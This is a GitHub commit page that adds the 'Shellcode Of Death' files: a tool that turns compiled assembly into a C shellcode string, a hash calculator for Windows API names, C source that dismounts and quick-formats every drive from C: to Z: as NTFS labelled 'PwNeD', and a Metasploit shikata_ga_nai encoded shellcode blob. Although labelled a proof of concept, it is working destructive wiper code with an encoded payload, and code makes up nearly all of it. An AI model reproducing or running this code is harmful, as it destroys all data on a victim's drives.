Skip to content

Commit 2c226ac

Browse files
hacksysteamhacksysteam
committed
Shellcode Of Death files.
1 parent 390105b commit 2c226ac

22 files changed

Lines changed: 1128 additions & 0 deletions

.gitignore

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
/.project

DumpShellcode.c

Lines changed: 132 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,132 @@
1+
/*
2+
_ __ _____
3+
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
4+
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
5+
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
6+
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
7+
|___/
8+
9+
http://hacksys.vfreaks.com/
10+
hacksysteam@hotmail.com
11+
12+
Module Name:
13+
14+
Dump Shellcode In C Style
15+
16+
Abstract:
17+
18+
A simple program that will generate shellcode from source file.
19+
Using pure assembly is prefered.
20+
the binary path of gcc and objcopy must add to the windows environment.
21+
This code is only work for windows platform not linux. ;)
22+
by MicroMike
23+
24+
Fixed by Ashfaq Ansari
25+
26+
IDE:
27+
28+
Dev-C++ 4.9.9.2 (Windows XP SP3)
29+
30+
Compiler:
31+
32+
gcc 3.4.2
33+
34+
*/
35+
36+
#include <stdio.h>
37+
#include <stdlib.h>
38+
39+
void create_obj_file(const char *filename){
40+
char command[100];
41+
sprintf(command, "gcc -c -o temp.o %s", filename);
42+
system(command);
43+
/* strip the trash section such as debug */
44+
//system("objcopy --strip-debug --strip-unneeded temp.o");
45+
system("objcopy --strip-all temp.o");
46+
}
47+
48+
void dump_shellcode(FILE *optr){
49+
unsigned int loop, counter=1, ch=1, nop_counter=0, null_counter=0;
50+
unsigned char header[20];
51+
unsigned short *SectionNum;
52+
int buffer;
53+
unsigned char str_to_write[50];
54+
FILE *iptr;
55+
iptr = fopen("temp.o", "rb");
56+
if(iptr == NULL){
57+
printf("Can not open file, is the file name correct??\n");
58+
exit(1);
59+
}
60+
/* reading header */
61+
for(loop=0; loop<20; loop++){
62+
header[loop] = fgetc(iptr);
63+
}
64+
/* This is the field I care for ~~ */
65+
/* this value should only be one, only has .text section */
66+
SectionNum = (unsigned short*)&(header[2]);
67+
68+
/* each section header has 40 bytes*/
69+
fseek(iptr, 40*(*SectionNum), SEEK_CUR);
70+
71+
/* the following is just some file operations */
72+
fputs("unsigned char *shellcode=\n\"", optr);
73+
74+
printf("\nExtracting the shellcode:\n\n");
75+
76+
printf("unsigned char *shellcode=\n\"");
77+
78+
while(ch != feof(iptr)){
79+
80+
memset(str_to_write, 0, 50);
81+
buffer = fgetc(iptr);
82+
83+
/* GCC issue on Windows:
84+
Why does GCC pad functions with NOPs?
85+
http://stackoverflow.com/questions/7912464/why-does-gcc-pad-functions-with-nops
86+
*/
87+
if(buffer == 0x90){
88+
nop_counter++;
89+
}
90+
if(nop_counter > 1){
91+
break;
92+
}
93+
/* Null byte counter */
94+
if(buffer == 0x00){
95+
null_counter++;
96+
}
97+
sprintf(str_to_write, "\\x%02x", buffer);
98+
printf("%s", str_to_write);
99+
fputs(str_to_write, optr);
100+
if(counter++ > 10){
101+
printf("\"\n\"");
102+
fputs("\"\n\"",optr);
103+
counter = 1;
104+
}
105+
ch++;
106+
}
107+
108+
printf("\"\n");
109+
fputs("\"\n", optr);
110+
printf("\nLength of Shellcode: %d", ch-1);
111+
printf("\nNumber of NULL's: %d\n", null_counter);
112+
fclose(iptr);
113+
}
114+
115+
int main(int argc, char **argv){
116+
FILE *optr;
117+
if(argc < 2){
118+
printf("\nUsage: DumpShellcode.exe <Source assembly file> <Output dump file>\n");
119+
exit(1);
120+
}
121+
create_obj_file(argv[1]);
122+
123+
optr = fopen(argv[2], "w");
124+
if(optr == NULL){
125+
printf("Can not create new file: %s", argv[2]);
126+
exit(1);
127+
}
128+
dump_shellcode(optr);
129+
fclose(optr);
130+
system("del temp.o");
131+
132+
}

DumpShellcode.exe

18.4 KB
Binary file not shown.

HashCalculator.cpp

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
4+
/*
5+
_ __ _____
6+
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
7+
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
8+
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
9+
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
10+
|___/
11+
12+
http://hacksys.vfreaks.com/
13+
hacksysteam@hotmail.com
14+
15+
Thanks to:
16+
17+
Ruei-Min Jiang (@mike820324) a.k.a MicroMike
18+
respect to you bro.
19+
20+
Module Name:
21+
22+
Hash Calculator
23+
24+
Abstract:
25+
26+
This function calculates the Function hash according
27+
to its name.
28+
29+
IDE:
30+
31+
Dev-C++ 4.9.9.2 (Windows XP SP3)
32+
33+
Compiler:
34+
35+
gcc 3.4.2
36+
37+
*/
38+
39+
unsigned int hash_function(const char* string){
40+
unsigned int value = 0;
41+
__asm__("xor %%ebx, %%ebx;\n\t\
42+
loop:\n\t\
43+
xor %%eax, %%eax;\n\t\
44+
lodsb;\n\t\
45+
rol $5, %%ebx;\n\t\
46+
addl %%eax, %%ebx;\n\t\
47+
cmp $0, %%eax;\n\t\
48+
jnz loop;\n\t\
49+
ror $5, %%ebx;\n\t\
50+
movl %%ebx, %0;\n\t"
51+
:"=m" (value)
52+
:"S" (string)
53+
:
54+
);
55+
printf("%s: 0x%x\n",string,value);
56+
}
57+
58+
int main(){
59+
hash_function("LoadLibraryA");
60+
hash_function("CloseHandle");
61+
hash_function("CreateFileA");
62+
hash_function("ExitProcess");
63+
hash_function("FormatEx");
64+
hash_function("DeviceIoControl");
65+
hash_function("Sleep");
66+
system("pause");
67+
}

HashCalculator.exe

15.5 KB
Binary file not shown.

ShellcodeOfDeath.c

Lines changed: 145 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,145 @@
1+
#include <windows.h>
2+
#include <WinIoCtl.h>
3+
#define _UNICODE 1
4+
5+
/*
6+
_ __ _____
7+
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
8+
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
9+
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
10+
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
11+
|___/
12+
13+
http://hacksys.vfreaks.com/
14+
hacksysteam@hotmail.com
15+
16+
Author:
17+
18+
Ashfaq Ansari
19+
hacksysteam@hotmail.com
20+
21+
Thanks:
22+
23+
Mark Russinovich (Systems Internals - http://www.sysinternals.com)
24+
25+
Module Name:
26+
27+
Shellcode Of Death
28+
29+
Abstract:
30+
31+
This is a proof of concept shellcode in C format.
32+
33+
IDE:
34+
35+
Dev-C++ 4.9.9.2 (Windows XP SP3)
36+
37+
Compiler:
38+
39+
gcc 3.4.2
40+
41+
*/
42+
43+
typedef enum {
44+
PROGRESS,
45+
DONEWITHSTRUCTURE,
46+
UNKNOWN2,
47+
UNKNOWN3,
48+
UNKNOWN4,
49+
UNKNOWN5,
50+
INSUFFICIENTRIGHTS,
51+
UNKNOWN7,
52+
VOLUME_IN_USE,
53+
CANT_QUICK_FORMAT,
54+
UNKNOWNA,
55+
DONE,
56+
UNKNOWNC,
57+
UNKNOWND,
58+
OUTPUT,
59+
STRUCTUREPROGRESS
60+
} CALLBACKCOMMAND;
61+
62+
typedef BOOLEAN (__stdcall *PFMIFSCALLBACK)( CALLBACKCOMMAND Command,
63+
DWORD SubAction,
64+
PVOID ActionInfo );
65+
66+
typedef VOID (__stdcall *PFORMATEX)( PWCHAR DriveRoot,
67+
DWORD MediaFlag,
68+
PWCHAR Format,
69+
PWCHAR Label,
70+
BOOL QuickFormat,
71+
DWORD ClusterSize,
72+
PFMIFSCALLBACK Callback );
73+
74+
PFORMATEX FormatEx;
75+
76+
BOOLEAN __stdcall FormatExCallback( CALLBACKCOMMAND Command,
77+
DWORD Modifier,
78+
PVOID Argument )
79+
{
80+
return TRUE;
81+
}
82+
83+
84+
int main( )
85+
{
86+
int i;
87+
int res;
88+
char szVolumeAccessPath[] = "\\\\.\\X:";
89+
DWORD dwRet;
90+
HANDLE hVolRead;
91+
PWCHAR DriveList[] = {L"C:", L"D:", L"E:", L"F:", L"G:", L"H:", L"I:",
92+
L"J:", L"K:", L"L:", L"M:", L"N:", L"O:", L"P:",
93+
L"Q:", L"R:", L"S:", L"T:", L"U:", L"V:", L"W:",
94+
L"X:", L"Y:", L"Z:"};
95+
WCHAR RootDirectory[MAX_PATH];
96+
97+
LoadLibrary( "fmifs.dll" );
98+
FormatEx = (void *) GetProcAddress(GetModuleHandle("fmifs.dll"),
99+
"FormatEx");
100+
101+
for ( i = 0; i <= 23; i++){
102+
103+
wcscpy( RootDirectory,DriveList[i] );
104+
RootDirectory[2] = L'\\';
105+
RootDirectory[3] = (WCHAR) 0;
106+
szVolumeAccessPath[4] = RootDirectory[0];
107+
108+
//Get the handle to the drive
109+
hVolRead = CreateFile(szVolumeAccessPath,
110+
GENERIC_READ | GENERIC_WRITE,
111+
FILE_SHARE_READ | FILE_SHARE_WRITE,
112+
NULL,
113+
OPEN_EXISTING,
114+
0,
115+
NULL);
116+
117+
// dismount the file system
118+
// no need to lock the volume
119+
// once dismounted all the handles will be invalid
120+
res = DeviceIoControl(hVolRead,
121+
FSCTL_DISMOUNT_VOLUME,
122+
NULL,
123+
0,
124+
NULL,
125+
0,
126+
&dwRet,
127+
NULL);
128+
129+
// Close the handle
130+
CloseHandle(hVolRead);
131+
132+
//Format the drive
133+
//Proceed to next drive if error occurs
134+
FormatEx(RootDirectory,
135+
0xC,
136+
L"NTFS",
137+
L"PwNeD - HackSys Team",
138+
TRUE,
139+
4096,
140+
FormatExCallback );
141+
142+
Sleep(200);
143+
}
144+
return 0;
145+
}

ShellcodeOfDeath.exe

17.4 KB
Binary file not shown.

ShellcodeOfDeathMetasploitShikataGaNaiEncoded.shellcode

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=1)
2+
3+
unsigned char buf[] =
4+
"\xdd\xc2\xbd\x7d\x18\xca\x70\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
5+
"\x6b\x83\xe8\xfc\x31\x68\x14\x03\x68\x69\xfa\x3f\x9b\xcb\xcb"
6+
"\x7f\xd7\xdf\xa8\x81\x3e\x4c\xff\xb0\x65\x43\x3f\x1e\x58\x60"
7+
"\xba\x5e\x98\xe5\x3d\x60\x6b\x1a\x7c\xaa\x96\xe5\xb4\x75\xc2"
8+
"\x61\x48\xc6\x1f\x57\x8d\x4f\x0f\xec\x52\x6c\x3b\xb6\x50\xf4"
9+
"\xb6\x32\x57\x54\x42\x7a\x77\xd9\x48\x78\x9f\x22\x8f\x83\xa0"
10+
"\xfe\xfb\x30\x7b\x8c\xf0\xcc\xe5\x05\x0c\x91\xcc\xe6\xf2\x11"
11+
"\x0f\x92\x56\x0d\x82\xb8\x72\xa6\x98\x43\x0f\xbc\xa2\x80\x21"
12+
"\x75\xc6\xa7\x72\x85\x07\xa8\xf9\xc5\x0b\x23\xbd\xd9\x98\x63"
13+
"\x36\x6a\xe6\xa3\xcd\x6c\x2d\xeb\xc9\x19\xa2\x9b\x8d\xba\x46"
14+
"\xf7\x26\x2c\xe6\x60\xb2\x24\x4f\xba\x88\x8f\xe7\xd5\x61\x8d"
15+
"\x20\xb1\x06\xde\x89\xae\x61\xe6\xf0\x9f\xbd\x8e\x26\x02\x5b"
16+
"\x7d\x5e\x58\x36\x86\x39\x92\x38\x0b\x40\xd5\xb3\x07\xe2\x3d"
17+
"\x27\x9c\x40\xe6\x44\x5d\x98\x6f\xb6\xf8\x48\xfb\x7b\x47\x6a"
18+
"\x13\xe8\x48\x94\x1c\xb6\xe6\x2c\x01\xa9\x8f\x56\x2e\x25\x67"
19+
"\x47\x4e\xc5\x88\x1e\xdc\x53\x10\xac\x30\xc0\xb0\x3e\x4d\xe3"
20+
"\x36\xe1\x27\xe4\x9f\x94\x77\x3b\xcd\xf5\xd5\x56\xf2\xab\xb3"
21+
"\xa5\x9c\x4b\x44\xaa\x9c\x1a\xcf\xf7\x08\x5c\x1c\x57\xb3\x4e"
22+
"\xa7\x69\x61\xdc\x25\xd5\xa1\xe5\x66\xb4\xfb\xb7\xda\x50\xdb"
23+
"\x37\xd2\xa0\x4b\xb3\xb9\xa8\x94\x10\xbe\xdd\x4e\x93\xca\x43"
24+
"\x82\x64\x1f\xf6\x1c\xdc\xa0\x09\x20\xb1\xc8\x09\x30\x31\x09"
25+
"\x60\x31\xbc\x8f\x6e\x31\xbe\x8f\xde\xbc\x38\x9f\xde\xbe\x44"
26+
"\xf0\xb4\xb2\xc9\xb6\x40\x9a\x5a\x6b\x51\xe5\x8e\xfc\x99\x19"
27+
"\x31\xfd\x92\x44\x35\x02\x77\xff\xcc\x7f\x3e\xf7\x2f\x62\x32"
28+
"\x6d\x30\xe9\x10\x61\xcf\x3e\x42\xfc\xd0\x3e\x6c\xa2\x2e\x9d"
29+
"\x93\x74\x2f\x41\x94\xcb\x2f\x43\x94\x97\x2f\xb3\x94\x69\x30"
30+
"\xe7\x94\x33\x30\x54\x95\xbb\x30\x0a\x95\xcc\x30\xe4\x95\x57"
31+
"\x31\x9c\x95\xb7\x31\x3e\x96\xce\x31\x9e\x96\x78\x32\xbf\x96"
32+
"\x1b\x32\x54\x97\x88\x32\xd3\x97\x5d\x33\x03\x98\xf5\x33\x26"
33+
"\x98\x94\x33\xc5\x98\x56\x34\x40\x10\xb3\x05\xaa\x62\x66\xa4"
34+
"\x26\x63";

0 commit comments

Comments
 (0)